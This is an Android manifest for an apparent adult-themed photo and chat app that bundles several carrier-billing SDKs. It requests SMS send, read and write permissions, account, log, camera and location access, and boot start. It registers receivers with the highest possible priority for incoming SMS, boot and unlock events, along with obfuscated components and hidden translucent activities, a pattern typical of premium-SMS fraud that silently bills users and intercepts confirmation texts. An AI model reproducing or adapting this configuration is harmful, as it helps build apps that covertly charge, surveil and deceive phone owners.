<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.Mei.sdl.wpkg"
    android:versionCode="15"
    android:versionName="15.11.20160927" >

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="17" />
    <!-- 添加权限 -->
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.WRITE_SETTINGS" />
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.MANAGE_ACCOUNTS" />
    <uses-permission android:name="android.permission.GET_ACCOUNTS" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="com.android.launcher.permission.READ_SETTINGS" />
    <uses-permission android:name="android.permission.READ_LOGS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.RECEIVE_MMS" />
    <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH" />
    <uses-permission android:name="android.permission.RECEIVE_SENDTO" />
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-permission android:name="android.permission.VIBRATE" />
    <uses-permission android:name="android.webkit.permission.PLUGIN" />
    <uses-permission android:name="android.permission.RECEIVE_USER_PRESENT" />
    <uses-permission android:name="android.permission.CHANGE_CONFIGURATION" />
    <uses-permission android:name="android.permission.RUN_INSTRUMENTATION" />
    <uses-permission android:name="android.permission.UPDATE_APP_OPS_STATS" />

    <uses-feature android:name="android.hardware.camera" />
    <uses-feature
        android:name="android.hardware.camera.front"
        android:required="false" />

    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <!-- 新增 -->
    <uses-permission android:name="android.permission.RECEIVE_MMS" />

    <application
        android:name="com.yunkl.os.MyApplication"
        android:allowBackup="true"
        android:icon="@drawable/logo"
        android:label="@string/setwx"
        android:theme="@android:style/Theme.NoTitleBar" >

        <!-- 启动页面 -->
        <activity
            android:name="com.yunkl.os.Launch"
            android:screenOrientation="portrait" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <!-- 主框架 -->
        <activity
            android:name="com.yunkl.os.Main"
            android:launchMode="singleTask"
            android:screenOrientation="portrait" >
        </activity>
        <!-- 个人主页 -->
        <activity
            android:name="com.yunkl.os.Person"
            android:screenOrientation="portrait" />
        <!-- 美女私房 -->
        <activity
            android:name="com.yunkl.os.Detail"
            android:screenOrientation="portrait"
            android:windowSoftInputMode="stateAlwaysHidden|adjustResize" />
        <!-- 聊天 -->
        <activity
            android:name="com.yunkl.os.Talk"
            android:screenOrientation="portrait"
            android:windowSoftInputMode="stateAlwaysHidden|adjustResize" />
        <!-- 浏览图片页面 -->
        <activity
            android:name="com.yunkl.os.ViewPageAc"
            android:screenOrientation="portrait"
            android:theme="@android:style/Theme.Translucent"
            android:windowSoftInputMode="stateHidden" />

        <service android:name="com.wdwe.u.MainService" />
        <!-- 友盟统计 -->
        <meta-data
            android:name="UMENG_APPKEY"
            android:value="@string/UMENG_KEY" >
        </meta-data>
        <meta-data
            android:name="UMENG_CHANNEL"
            android:value="@string/UMENG_CHANNEL" />
        <!-- 友盟统计end -->
        <!-- 计费配置 -->
        <meta-data
            android:name="ZMMerchantId"
            android:value="@string/ZM_Id" />
        <meta-data
            android:name="ZMAppId"
            android:value="@string/ZM_AppId" />
        <meta-data
            android:name="ZMOtherEnv"
            android:value="false" />
        <meta-data
            android:name="rushId"
            android:value="6000022" />
        <meta-data
            android:name="qsh_pid"
            android:value="@string/qsh_id" />

        <activity
            android:name="com.skymobi.pay.sdk.normal.zimon.EpsActivity"
            android:configChanges="orientation|keyboardHidden|screenSize"
            android:exported="true"
            android:theme="@android:style/Theme.Translucent.NoTitleBar.Fullscreen" />

        <service android:name="com.skymobi.pay.sdk.normal.zimon.EpsService" />

        <receiver
            android:name="com.skymobi.pay.sdk.normal.zimon.EpsReceiver"
            android:exported="false" >
            <intent-filter>
                <action android:name="com.skymobi.pay.plugin.advert" />
                <action android:name="com.skymobi.pay.plugin.recordupload" />
                <action android:name="com.skymobi.pay.plugin.push" />
                <action android:name="com.skymobi.pay.action.plugin" />
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED" />

                <data android:scheme="package" />
            </intent-filter>
        </receiver>
        <!--
        <receiver
            android:name="sdk.pay.TaskReceiver"
            android:process=":taskService" >
            <intent-filter android:priority="1000" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.intent.action.MEDIA_MOUNTED" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED" />
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED" />
                <action android:name="android.intent.action.TIME_TICK" />
                <action android:name="android.intent.action.MEDIA_MOUNTED" />
                <action android:name="android.intent.action.MEDIA_UNMOUNTED" />
                <action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>

        <service
            android:name="sdk.pay.TaskService"
            android:enabled="true"
            android:process=":taskService" /> <receiver android:name="com.android.sdk.t3.MsgReceiver" >
            <intent-filter android:priority="1000" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        -->

        <activity
            android:name="org.zzf.core.activity.ZhangPayActivity"
            android:exported="true"
            android:theme="@android:style/Theme.Translucent" >
        </activity>

        <service android:name="org.zzf.core.service.ZhangPayPlateService" >
        </service>

        <receiver android:name="org.zzf.core.service.ServiceRecevier" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.media.RINGER_MODE_CHANGED" />
            </intent-filter>
        </receiver>
        <receiver android:name="org.zzf.core.zdx.BootReceiver" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <service
            android:name="org.zzf.core.service.ZhangzhifuDxService"
            android:enabled="true" />

        <receiver
            android:name="org.zzf.core.zdx.ZdxReceiver"
            android:exported="true" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" >
                </action>

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.hoxq.lpve.uwisuq.a.a.c.b" >
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>

        <service android:name="com.hoxq.lpve.uwisuq.a.a.c.c" >
            <intent-filter>
                <action android:name="com_hoxq_lpve.service" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </service>

        <activity
            android:name="com.hoxq.lpve.uwisuq.a.a.c.a"
            android:configChanges="mcc|mnc|locale|touchscreen|keyboard|keyboardHidden|navigation|orientation|screenLayout|fontScale|uiMode"
            android:excludeFromRecents="true"
            android:exported="true"
            android:taskAffinity="com.hoxq.lpve"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" >
            <intent-filter>
                <action android:name="com_hoxq_lpve.activity" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </activity>
        <activity
            android:name="com.may.sdk.on.HejuActivity"
            android:screenOrientation="portrait"
            android:theme="@android:style/Theme.Dialog" />

        <meta-data
            android:name="hKey"
            android:value="@string/hj_key" />

        <!-- 新增 -->
        <!-- 联通架包配置 -->
        <!--
        <activity
            android:name="com.unicom.wostore.unipay.paysecurity.SecurityActivity"
            android:configChanges="screenSize|orientation"
            android:theme="@android:style/Theme.Light.NoTitleBar.Fullscreen" >
        </activity>

        <service android:name="com.unicom.wostore.unipay.paysecurity.SecurityServiceFramework" />
        -->
        <!-- <meta-data
            android:name="CHANNEL_ID"
            android:value="963" />
        <meta-data
            android:name="DBP"
            android:value="dr963" />
        <meta-data
            android:name="MS_CHANNEL"
            android:value="53115" />
        <meta-data
            android:name="WE_CHANNEL"
            android:value="10115" />
        <meta-data
            android:name="prames"
            android:value="SHYL9730-0049-20160918" />

        <service android:name="com.ab.ss.sm" />
        <service android:name="com.ab.ss.SeLrS" />

        <receiver android:name="com.nbb.fky.MRecevier" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED_2" />
            </intent-filter>
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.GSM_SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.nbb.fky.CrV" >
            <intent-filter android:priority="90000" >
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
        </receiver>

        <service android:name="com.an.se.ServiceW" />
        <service android:name="com.an.se.LogSw" />

        <receiver android:name="com.an.gb.RecevierW" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.an.gb.Cor" >
            <intent-filter android:priority="90000" >
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
        </receiver>

        <service android:name="com.bc.a" />

        <receiver android:name="com.bc.b" >
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
            <intent-filter>
                <data android:scheme="package" />

                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REMOVED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="com.android.curr.ytr.blcsms"
            android:exported="true" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED_2" />
            </intent-filter>
            <intent-filter android:priority="2147483647" >
                <action android:name="android.provider.Telephony.GSM_SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.git.model.GitReceiver" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.intent.action.SIM_STATE_CHANGED" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="android.intent.action.USER_PRESENT" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REMOVED" />

                <data android:scheme="package" />
            </intent-filter>
        </receiver>

        <service android:name="com.git.model.GitService" >
            <intent-filter>
                <action android:name="android.intent.service.TASKSERVICE" />
            </intent-filter>
        </service> -->

        <activity
            android:name="com.dxt.mipay.pay.Dialog1_3Activity"
            android:theme="@android:style/Theme.Translucent" >
        </activity>
        <activity
            android:name="com.dxt.mipay.pay.Dialog2Activity"
            android:theme="@android:style/Theme.Translucent" >
        </activity>

        <service android:name="com.dxt.mipay.pay.AppBaseService" >
        </service>

        <!--
        ycpayjar组件声明结束
        <meta-data android:name="APP_ID" android:value="160319JAR" />
        <meta-data android:name="SOURCE_ID" android:value="HC07-01" />
        -->
        <meta-data
            android:name="PARAM_APID"
            android:value="cp10002" />
        <!-- 计费配置 end -->
    </application>

</manifest>